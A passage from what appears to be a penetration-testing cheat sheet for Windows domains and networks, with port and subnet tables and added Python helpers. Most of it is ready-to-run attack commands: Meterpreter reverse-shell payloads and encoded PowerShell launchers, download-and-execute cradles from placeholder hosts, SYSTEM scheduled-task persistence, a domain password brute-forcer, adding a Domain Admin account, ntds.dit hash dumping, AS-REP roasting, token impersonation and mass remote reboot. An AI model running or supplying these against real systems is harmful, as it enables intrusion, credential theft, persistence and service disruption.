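    filtered (no answer before the timeout, or unreachable)."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except ConnectionRefusedError:
        return "closed"
    except (socket.timeout, OSError):
        return "filtered"
    finally:
        s.close()


def scan(host: str, ports: Iterable[int], timeout: float = 0.5,
         workers: int = 50) -> Dict[int, str]:
    """Probe every port concurrently; returns {port: state}."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: (p, probe(host, p, timeout)), ports))


def open_local_listener() -> Tuple[socket.socket, int]:
    """Self-test helper: a listening socket on an ephemeral loopback port.
    The kernel completes the handshake from the backlog, so no accept() is needed."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]


def free_local_port() -> int:
    """Self-test helper: bind and release an ephemeral port so it is closed."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("127.0.0.1", 0))
    port = s.getsockname()[1]
    s.close()
    return port


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"   # assumed target
    for port, state in sorted(scan(target, range(1, 1025)).items()):
        if state != "closed":
            print(f"{target}:{port} {state}")
```

Keep the timeout short on a LAN and raise it across a VPN; a host that returns "filtered" for everything usually means a host firewall is dropping SYNs rather than answering with RSTs.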
Ping command with 500 millisecond timeout
$ping = New-Object System.Net.NetworkInformation.Ping
$ping.Send("ip", 500)
Basic authentication window (credential prompt)
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass $Host.UI.PromptForCredential("title","message","user","domain")
Run the exe file (from cmd.exe) every 4 hours between August 8-11, 2013, 0800-1700
powershell.exe -Command "do {if ((Get-Date -format yyyyMMdd-HHmm) -match '201308(0[8-9]|1[0-1])-(0[8-9]|1[0-7])[0-5][0-9]') {Start-Process -WindowStyle Hidden 'C:\Temp\my.exe';Start-Sleep -s 14400}}while(1)"
Run PowerShell as another user
$pw = ConvertTo-SecureString -String "PASSWORD" -AsPlainText -Force;
$pp = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "DOMAIN\user", $pw
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command {Start-Process file.exe -verb runas}'
Download with PowerShell (iwr = Invoke-WebRequest)
powershell iwr -UseBasicParsing http://192.168.2.x/SharpHound.exe -OutFile SharpHound.exe
Email sender
powershell.exe Send-MailMessage -To "email" -From "email" -Subject "Subject" -Attachments "attachment file path" -Body "Body" -SmtpServer "target email server IP"
Activating remote access to PowerShell (requires credentials)
net time \\ip
at \\ip time "Powershell -Command 'Enable-PSRemoting -Force'"
at \\ip time+1 "Powershell -Command 'Set-Item wsman:\localhost\client\trustedhosts *'"
at \\ip time+2 "Powershell -Command 'Restart-Service WinRM'"
Enter-PSSession -ComputerName ip -Credential username
Hostname and IP list for a domain (from the DC's DNS zone)
Get-WmiObject -ComputerName DC -Namespace root\microsoftDNS -Class MicrosoftDNS_ResourceRecord -Filter "domainname='DOMAIN'" | Select textrepresentation
Download with PowerShell from a specific path (the ServerCertificateValidationCallback line disables TLS certificate checking so a self-signed listener works)
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $source=""https://YOUR_SPECIFIED_IP/file.zip""; $destination=""C:\master.zip""; $http = New-Object System.Net.WebClient; $response = $http.DownloadFile($source, $destination);"
Upload with PowerShell
The script sends a file ($filepath) over HTTP to the server ($server) in a POST request. A web server must be listening on the port designated in $server.
powershell.exe -noprofile -noninteractive -command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}; $server=""http://YOUR_SPECIFIED_IP/folder""; $filepath=""C:\master.zip""; $http = New-Object System.Net.WebClient; $response = $http.UploadFile($server, $filepath);"
Using PowerShell to run Meterpreter from memory
Needs Metasploit v4.5+ (msfvenom supports PowerShell output)
Use PowerShell (x86) with 32-bit Meterpreter payloads
The encodeMeterpreter.ps1 script is listed below
On the attacking system:
1. ./msfvenom -p windows/meterpreter/reverse_https -f psh -a x86 LHOST=1.1.1.1 LPORT=443 > audit.ps1
2. Move audit.ps1 into the same folder as encodeMeterpreter.ps1
3. Launch PowerShell (x86)
4. powershell.exe -executionpolicy bypass encodeMeterpreter.ps1
5. Copy the encoded Meterpreter string
Start the listener on the attacking system:
1. ./msfconsole
2. use exploit/multi/handler
3. set payload windows/meterpreter/reverse_https
4. set LHOST 1.1.1.1
5. set LPORT 443
6. exploit -j
On the target system (run PowerShell (x86)):
1. powershell.exe -noexit -encodedCommand <paste encoded Meterpreter string here>
PROFIT
encodeMeterpreter.ps1 [7]
# Get Contents of Script
$contents = Get-Content audit.ps1
# Compress Script
$ms = New-Object IO.MemoryStream
$action = [IO.Compression.CompressionMode]::Compress
$cs = New-Object IO.Compression.DeflateStream ($ms, $action)
$sw = New-Object IO.StreamWriter ($cs, [Text.Encoding]::ASCII)
$contents | ForEach-Object {$sw.WriteLine($_)}
$sw.Close()
# Base64 Encode Stream
$code = [Convert]::ToBase64String($ms.ToArray())
$command = "Invoke-Expression `$(New-Object IO.StreamReader (`$(New-Object IO.Compression.DeflateStream (`$(New-Object IO.MemoryStream (,`$([Convert]::FromBase64String('$code')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
# Invoke-Expression $command
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
# Write to Standard out
Write-Host $encodedCommand
Copyright 2012 TrustedSec, LLC. All rights reserved.
Please see reference [7] for disclaimer
Using PowerShell to start Meterpreter (second method)
On the BT attack box:
1. msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=8080 R | msfencode -t psh -a x86
On the attacking (Windows) system:
1. c:\> powershell
2. PS c:\> $cmd = 'PASTE THE CONTENTS OF THE PSH SCRIPT HERE'
3. PS c:\> $u = [System.Text.Encoding]::Unicode.GetBytes($cmd)
4. PS c:\> $e = [Convert]::ToBase64String($u)
5. PS c:\> $e
6. Copy the contents of $e
Start the listener on the attacking system (LHOST must match the payload's LHOST):
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.1.1.1
set LPORT 8080
exploit -j
On the target system (1: download the shellcode, 2: execute):
powershell -noprofile -noninteractive -command "& {$client=New-Object System.Net.WebClient; $client.DownloadFile('http://1.1.1.1/shell.txt', 'C:\windows\temp\shell.txt')}"
powershell -noprofile -noninteractive -command "& {$cmd=type 'C:\windows\temp\shell.txt'; powershell -noprofile -noninteractive -noexit -encodedCommand $cmd}"
PROFIT
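Both methods above end in the same place: a Base64 string of UTF-16LE text handed to -encodedCommand, and the TrustedSec script [7] additionally wraps the payload in a raw-DEFLATE/Base64 Invoke-Expression stub first. The block below is an added example, not code from the original cheat sheet or from TrustedSec, written in Python (standard library only) so the same logic runs on the attack box; it builds both encodings and, for the blue-team side, decodes an -EncodedCommand argument as it appears in a 4688 or Sysmon command line and inflates the stub back to the script. The sample script is a constructed stand-in for audit.ps1.

```python
"""PowerShell launcher encoding for the two methods above (added example,
Python standard library only; not part of the original cheat sheet).

Method 1 (encodeMeterpreter.ps1): script -> raw DEFLATE -> Base64 -> an
Invoke-Expression/DeflateStream stub.  Method 2: the script text itself.
Both end as Base64 of UTF-16LE text, which is what -EncodedCommand takes.
unwrap_compressed_stub is the defender's side: recover the script from a
-EncodedCommand argument seen in process-creation logs.
"""
import base64
import zlib
from typing import Optional

# Constructed stand-in for audit.ps1 / the msfvenom psh output (assumption).
SAMPLE_SCRIPT = "Write-Host 'hello from memory'\nGet-Date\n"

# Decompress-and-run stub produced by the TrustedSec script above.
_STUB = ("Invoke-Expression $(New-Object IO.StreamReader ($(New-Object "
         "IO.Compression.DeflateStream ($(New-Object IO.MemoryStream "
         "(,$([Convert]::FromBase64String('{b64}')))), "
         "[IO.Compression.CompressionMode]::Decompress)), "
         "[Text.Encoding]::ASCII)).ReadToEnd();")


def deflate_raw(data: bytes) -> bytes:
    """Raw DEFLATE without zlib header/trailer: what .NET DeflateStream writes."""
    c = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def inflate_raw(data: bytes) -> bytes:
    return zlib.decompress(data, wbits=-zlib.MAX_WBITS)


def build_compressed_stub(script: str) -> str:
    """Method 1: StreamWriter.WriteLine emits each line with CRLF, ASCII encoded."""
    body = "".join(line + "\r\n" for line in script.splitlines()).encode("ascii")
    return _STUB.format(b64=base64.b64encode(deflate_raw(body)).decode("ascii"))


def to_encoded_command(command: str) -> str:
    """Both methods end here: -EncodedCommand expects Base64(UTF-16LE)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Reverse of to_encoded_command, e.g. on a 4688/Sysmon command line."""
    return base64.b64decode(b64).decode("utf-16-le")


def unwrap_compressed_stub(command: str) -> Optional[str]:
    """If the decoded command is a method-1 stub, inflate and return the script."""
    marker = "FromBase64String('"
    start = command.find(marker)
    if start == -1:
        return None
    start += len(marker)
    end = command.find("'", start)
    return inflate_raw(base64.b64decode(command[start:end])).decode("ascii")


if __name__ == "__main__":
    encoded = to_encoded_command(build_compressed_stub(SAMPLE_SCRIPT))
    print("powershell.exe -noexit -encodedCommand", encoded)
    print(unwrap_compressed_stub(decode_encoded_command(encoded)))
```

The UTF-16LE step is the detail that trips people up: Base64 of ASCII text is not accepted by -encodedCommand, and a decoder that forgets it sees the script as every other byte being NUL. Note that a decoded stub still contains the Base64 blob, so detection rules keyed on "FromBase64String" and "DeflateStream" fire on the decoded command line, not on the raw argument.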
Identify privilege escalation paths with PowerUp
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
. .\PowerUp.ps1
Windows registry
Operating system information
HKLM\Software\Microsoft\Windows NT\CurrentVersion
Product name
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v ProductName
Installation date
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v InstallDate
Registered owner
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v RegisteredOwner
System root (boot volume)
HKLM\Software\Microsoft\Windows NT\CurrentVersion /v SystemRoot
Time zone information (in minutes from UTC)
HKLM\System\CurrentControlSet\Control\TimeZoneInformation /v ActiveTimeBias
Mapped network drives (MRU)
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU
Mounted devices
HKLM\System\MountedDevices
USB devices
HKLM\System\CurrentControlSet\Enum\USBSTOR
Enable IP forwarding
HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v IPEnableRouter = 1
Password keys: LSA secrets (cached service, VPN and other passwords) and autologon
HKLM\Security\Policy\Secrets
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon /v AutoAdminLogon
Audit policy information
HKLM\Security\Policy\PolAdtEv
Kernel and user services
HKLM\System\CurrentControlSet\Services
Software installed on the system
HKLM\Software
Software installed for the user
HKCU\Software
Recent documents
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs
Last locations visited by the user in Open/Save dialogs (LastVisitedPidlMRU and OpenSavePidlMRU on Vista and later)
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU & \OpenSaveMRU
URLs typed in Internet Explorer
HKCU\Software\Microsoft\Internet Explorer\TypedURLs
MRU lists (Run dialog)
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
The last registry key opened in regedit
HKCU\Software\Microsoft\Windows\CurrentVersion\Applets\Regedit /v LastKey
Startup paths (autoruns)
HKLM\Software\Microsoft\Windows\CurrentVersion\Run & \RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run & \RunOnce
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load & \Run
Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Get Windows information with dsquery
List of domain users
dsquery user -limit 0
List of domain groups (domain=victim.com)
dsquery group "cn=users,dc=victim,dc=com"
List of domain administrators
dsquery group -name "domain admins" | dsget group -members -expand
List of a user's groups
dsquery user -name bob | dsget user -memberof -expand
Get the user's SAM account name
dsquery user -name bob | dsget user -samid
List of users who have been inactive for the last two weeks
dsquery user -inactive 2
Add user
dsadd user "CN=Bob,CN=Users,DC=victim,DC=com" -samid bob -pwd bobpass -display "Bob" -pwdneverexpires yes -memberof "CN=Domain Admins,CN=Users,DC=victim,DC=com"
Delete user
dsrm -subtree -noprompt "CN=Bob,CN=Users,DC=victim,DC=com"
List of domain computers with their operating systems
dsquery * "DC=victim,DC=com" -scope subtree -attr "cn" "operatingSystem" "operatingSystemServicePack" -filter "(&(objectclass=computer)(objectcategory=computer)(operatingSystem=Windows*))"
List of site names
dsquery site -o rdn -limit 0
List of all subnets in the site
dsquery subnet -site sitename -o rdn
List of servers in the site
dsquery server -site sitename -o rdn
Get domain servers
dsquery * domainroot -filter "(&(objectCategory=Computer)(objectClass=Computer)(operatingSystem=*Server*))" -limit 0
DC list of the site
dsquery * "CN=Sites,CN=Configuration,DC=forestRootDomain" -filter "(objectCategory=Server)"
Script writing
Batch script (cmd.exe) variables must be written as %%i inside a .bat file; on the command line they are written %i. The examples below use the command-line form.
Create a ping sweep
for /L %i in (10,1,254) do @(for /L %x in (10,1,254) do @ping -n 1 -w 100 10.10.%i.%x 2>nul | find "Reply" && echo 10.10.%i.%x >> live.txt)
Loop over the lines of a file
for /F %i in (file) do command
Domain brute forcer
for /F %n in (names.txt) do for /F %p in (pawds.txt) do net use \\DC01\IPC$ /user:domain\%n %p 1>NUL 2>&1 && echo %n:%p && net use /delete \\DC01\IPC$ > NUL
Account lockout (lockout.bat); remove the echo in front of net use to actually send the attempts
@echo Test run:
for /f %U in (list.txt) do @for /L %C in (1,1,5) do @echo net use \\WIN-1234\c$ /USER:%U wrong_pass
DHCP exhaustion
for /L %i in (2,1,254) do (netsh interface ip set address local static x.x.x.%i netmask gw 1 & ping 127.0.0.1 -n 1 -w 10000 > nul)
DNS reverse lookup
for /L %i in (100,1,105) do @nslookup 1.1.1.%i | findstr /i /c:"Name" >> dns.txt && echo Server: 1.1.1.%i >> dns.txt
Search all paths for files whose name contains "pass" and display the details of each file
forfiles /P c:\temp /s /m *pass* -c "cmd /c echo @isdir @fdate @ftime @relpath @path @fsize"
Malicious domain simulation (for IDS testing)
# Run a packet capture on the attack domain's DNS server to receive the callouts
# domains.txt should contain known malicious domains
for /L %i in (0,1,100) do (for /F %n in (domains.txt) do nslookup %n attack_domain > NUL 2>&1 & ping -n 5 127.0.0.1 > NUL 2>&1)
IE web looper (traffic generator)
for /L %C in (1,1,5000) do @for %U in (www.yahoo.com www.pastebin.com www.paypal.com www.craigslist.org www.google.com) do start /b iexplore %U & ping -n 6 localhost & taskkill /F /IM iexplore.exe
Find service binaries outside system32 and check their permissions (a writable binary path is a privilege escalation)
for /f "tokens=2 delims='='" %a in ('wmic service list full ^| find /i "pathname" ^| find /i /v "system32"') do @echo %a >> c:\windows\temp\3afdaga.tmp
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\3afdaga.tmp) do cmd.exe /c icacls "%a"
Spinning reboot (replace /r with /s to shut down):
for /L %i in (2,1,254) do shutdown /r /m \\1.1.1.%i /f /t 0 /c "Reboot message"
Create a shell using VBS (requires credentials)
# Create a .vbs script with the following
Set shell = wscript.createobject("wscript.shell")
shell.run "runas /user:user " & """" & "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -Noninteractive -ep bypass -nop -c \" & """" & "IEX ((New-Object Net.WebClient).downloadstring('url'))\" & """" & """"
wscript.sleep(100)
shell.Sendkeys "password" & "{ENTER}"
Scheduling tasks
Scheduled task binary paths CANNOT contain spaces because everything after the first space in the path is treated as a command-line argument. Enclose the /TR path parameter in backslash-escaped quotation marks (\"):
schtasks /TR "\"C:\Program Files\file.exe\" -x arg"
Schedule a task (ST=start time, SD=start date, ED=end date) *needs admin access
SCHTASKS /CREATE /TN "Task Name" /SC HOURLY /ST HH:MM /F /RL HIGHEST /SD MM/DD/YYYY /ED MM/DD/YYYY /TR "C:\my.exe" /RU DOMAIN\user /RP password
Persistent scheduled tasks [10]
The commands below use the System32 powershell.exe. On 64-bit Windows that is the 64-bit host; the 32-bit (x86) PowerShell needed for 32-bit payloads is:
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
# (x86) on user logon
SCHTASKS /CREATE /TN "Task Name" /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onlogon /RU System
# (x86) on system start
SCHTASKS /CREATE /TN "Task Name" /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onstart /RU System
# (x86) on user idle (30 minutes)
SCHTASKS /CREATE /TN "Task Name" /TR "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://ip:port/payload''))'" /SC onidle /i 30
Instructions for working with SMB
List shares as a specific user
smbclient -L 10.10.10.10 -U tlevel
List shares without a password (null session)
smbclient -N -L 10.10.10.10
Change password
smbpasswd -r 10.10.10.10 -U tlevel
Show shares
smbclient -L 10.10.10.10
Connect to the specified share
smbclient //10.10.10.10/forensic
Login to shell (interactive smbclient session on a share)
smbclient //10.1.10.18/profiles
Get AS-REP hashes for users that do not require Kerberos pre-authentication
python3 /usr/share/doc/python3-impacket/examples/GetNPUsers.py 10.10.10.10/ -usersfile users.txt
Guess SMB passwords
with Metasploit
msf5 > use auxiliary/scanner/smb/smb_login
set PASS_FILE wordlist
set USER_FILE users.txt
set RHOSTS 10.10.10.10
run
with medusa
medusa -h 10.10.10.10 -U users.txt -P wordlist -M smbnt
rpcclient commands
Connect to the system
rpcclient 10.10.10.10 -U support
Show user information
queryuser support
Show users
enumdomusers
Show privileges
enumprivs
Reset a user's password (info level 23; needs the right to reset passwords on that account)
setuserinfo2 username 23 'NewPassword'
Show printers
enumprinters
NTLM extraction from an ntds.dit file (offline, together with the SYSTEM hive)
python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL -outputfile nt-hash
Gather information using SharpHound
https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.exe
.\SharpHound.exe -c All --zipfilename output.zip
Gather information about SQL Server
https://github.com/NetSPI/PowerUpSQL/blob/master/PowerUpSQL.ps1
. .\PowerUpSQL.ps1
Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
Obtain AS-REP roast hashes
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
.\Rubeus.exe asreproast
List live IPs without using nmap
for /L %i in (1,1,255) do @ping -n 1 -w 200 10.10.10.%i > nul && echo 10.10.10.%i is up.
or
https://github.com/sperner/PowerShell/blob/master/PortScan.ps1
. .\PortScan.ps1
.\PortScan.ps1 10.10.10.16 1 10000
Service identification with Test-WSMan
PS> Test-WSMan -ComputerName ip -Port 6666
Enumerate OUs (PowerView)
Get-NetOU -Verbose
Retrieve users in the 'ICS' OU
Get-DomainUser -SearchBase "LDAP://OU=ICS,DC=nuclear,DC=site" -Verbose
SharpHound collect
SharpHound.exe --CollectionMethod All
Impersonate the token of nuclear\vdadmin (in a psexec session)
incognito.exe list_tokens -u
incognito.exe execute -c "NUCLEAR\vdadmin" C:\Users\Public\binary.exe
Network
Common ports
No.        Service
21         FTP
22         SSH
23         Telnet
25         SMTP
49         TACACS
53         DNS
67/68      DHCP (UDP)
69         TFTP (UDP)
80         HTTP
88         Kerberos
110        POP3
111        RPC
123        NTP (UDP)
135        Windows RPC
137        NetBIOS
138        NetBIOS
139        SMB
143        IMAP
161        SNMP (UDP)
179        BGP
201        AppleTalk
389        LDAP
443        HTTPS
445        SMB
500        ISAKMP (UDP)
514        Syslog
520        RIP
546/547    DHCPv6
587        SMTP
902        VMware
1080       SOCKS proxy
1194       VPN
1433/1434  MS-SQL
1521       Oracle
1629       DameWare
2049       NFS
3128       Squid proxy
3306       MySQL
3389       RDP
5060       SIP
5222       Jabber
5432       Postgres
5666       Nagios
5900       VNC
6000       X11
6129       DameWare
6667       IRC
9001       Tor
9001       HSQL
9090/9091  Openfire
9100       JetDirect
Get operating system information from the TTL
OS                        Initial TTL
Windows                   128
Linux                     64
Network devices (Cisco)   255
Solaris                   255
FTP status codes
Status                                   Code
Service ready (waiting for user login)   220
Not logged in                            530
HTTP status codes
Status                       Code
OK (successful)              200
Forbidden (lack of access)   403
IPv4 information
Classful ranges
Class   Start        End
A       0.0.0.0      127.255.255.255
B       128.0.0.0    191.255.255.255
C       192.0.0.0    223.255.255.255
D       224.0.0.0    239.255.255.255 (multicast)
E       240.0.0.0    255.255.255.255 (reserved)
Reserved ranges
Start          End
10.0.0.0       10.255.255.255
127.0.0.0      127.255.255.255
172.16.0.0     172.31.255.255
192.168.0.0    192.168.255.255
Subnetting
Prefix   Netmask            Hosts
/31      255.255.255.254    2 (point-to-point links only, RFC 3021)
/30      255.255.255.252    2
/29      255.255.255.248    6
/28      255.255.255.240    14
/27      255.255.255.224    30
/26      255.255.255.192    62
/25      255.255.255.128    126
/24      255.255.255.0      254
/23      255.255.254.0      510
/22      255.255.252.0      1022
/21      255.255.248.0      2046
/20      255.255.240.0      4094
/19      255.255.224.0      8190
/18      255.255.192.0      16382
/17      255.255.128.0      32766
/16      255.255.0.0        65534
/15      255.254.0.0        131070
/14      255.252.0.0        262142
/13      255.248.0.0        524286
/12      255.240.0.0        1048574
/11      255.224.0.0        2097150
/10      255.192.0.0        4194302
/9       255.128.0.0        8388606
/8       255.0.0.0          16777214
Calculate the subnet range
Given 1.1.1.101/28:
2^8 = 256 addresses in the last octet; the /28 netmask is 255.255.255.240
256 - 240 = 16, so subnets start every 16 addresses: 1.1.1.0, 1.1.1.16, 1.1.1.32, ...
The given IP falls in 1.1.1.96 - 1.1.1.111 (usable hosts 1.1.1.97 - 1.1.1.110)
IPv6 information
Multicast ("broadcast") addresses
ff02::1 - link-local nodes
ff05::1 - site-local nodes
ff01::2 - node-local routers
ff02::2 - link-local routers
ff05::2 - site-local routers
Interface addresses
fe80:: - link-local
2001:: - routable (global unicast)
::a.b.c.d - IPv4-compatible IPv6
::ffff:a.b.c.d - IPv4-mapped IPv6
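The subnet arithmetic above is easy to get wrong by hand (the usable-host column in particular, since it is 2^n minus network and broadcast). The following is an added example, not part of the original cheat sheet, in Python with the standard-library ipaddress module: it reproduces the 1.1.1.101/28 worked case, generates the /31 to /8 table, and classifies an address by class letter and by the reserved ranges listed above. The /31 and /32 special cases are handled explicitly; the input addresses are assumptions.

```python
"""Subnet arithmetic with the standard-library ipaddress module (added
example, not from the original cheat sheet)."""
import ipaddress
from typing import Dict, List, Tuple

# Reserved ranges listed on this page (RFC 1918 private space plus loopback).
RESERVED = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def usable_hosts(prefixlen: int) -> int:
    """Usable IPv4 hosts for a prefix: 2^(32-p) minus network and broadcast.
    /31 is the RFC 3021 point-to-point exception (both addresses usable)
    and /32 is a single host route."""
    if prefixlen == 32:
        return 1
    if prefixlen == 31:
        return 2
    return 2 ** (32 - prefixlen) - 2


def subnet_info(cidr: str) -> Dict[str, object]:
    """Everything the worked /28 example derives by hand.
    strict=False keeps the host bits (1.1.1.101) and lets ipaddress
    compute the enclosing network instead of raising."""
    net = ipaddress.ip_network(cidr, strict=False)
    # /31 and /32 have no separate network/broadcast addresses.
    edge = 1 if net.prefixlen < 31 else 0
    return {
        "netmask": str(net.netmask),
        "block_size": net.num_addresses,   # 256 - last mask octet for /24../32
        "network": str(net.network_address),
        "broadcast": str(net.broadcast_address),
        "first_host": str(net.network_address + edge),
        "last_host": str(net.broadcast_address - edge),
        "usable": usable_hosts(net.prefixlen),
    }


def host_table(start: int = 31, end: int = 8) -> List[Tuple[int, str, int]]:
    """(prefix, netmask, usable hosts) rows for /start down to /end."""
    return [(p, str(ipaddress.ip_network(f"0.0.0.0/{p}").netmask), usable_hosts(p))
            for p in range(start, end - 1, -1)]


def classify_ipv4(addr: str) -> Tuple[str, bool]:
    """Classful letter from the first octet, and whether the address sits in
    one of the reserved ranges above (so it is not routable on the Internet)."""
    ip = ipaddress.ip_address(addr)
    first = int(addr.split(".")[0])
    if first < 128:
        cls = "A"
    elif first < 192:
        cls = "B"
    elif first < 224:
        cls = "C"
    elif first < 240:
        cls = "D"
    else:
        cls = "E"
    return cls, any(ip in n for n in RESERVED)


if __name__ == "__main__":
    for key, value in subnet_info("1.1.1.101/28").items():   # the page's worked case
        print(f"{key:>10}: {value}")
    for prefix, mask, hosts in host_table():
        print(f"/{prefix:<3} {mask:<16} {hosts}")
```

Feeding a scope like 10.10.10.0/24 into subnet_info before a sweep gives the exact first and last host to scan, which avoids both wasting probes on the broadcast address and quietly missing the top of the range.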
IPv6 toolbox (thc-ipv6)
Remote network DoS:
rsmurf6 eth# remote_ipv6
Port forward with chisel (reverse SOCKS)
./chisel server -p 9000 --reverse
./chisel client ip:9000 R:socks
IPv6 tunnel over IPv4 with socat
socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[2001:...]:port
./nikto.pl -host 127.0.0.1 -port 8080
Cisco commands
Command                Description
enable                 Enter privileged EXEC mode
configure terminal     Enter global configuration mode (interface settings etc.)